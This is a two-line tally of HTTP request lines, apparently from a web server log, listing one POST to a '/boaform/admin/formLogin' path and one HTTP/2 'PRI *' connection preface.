1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0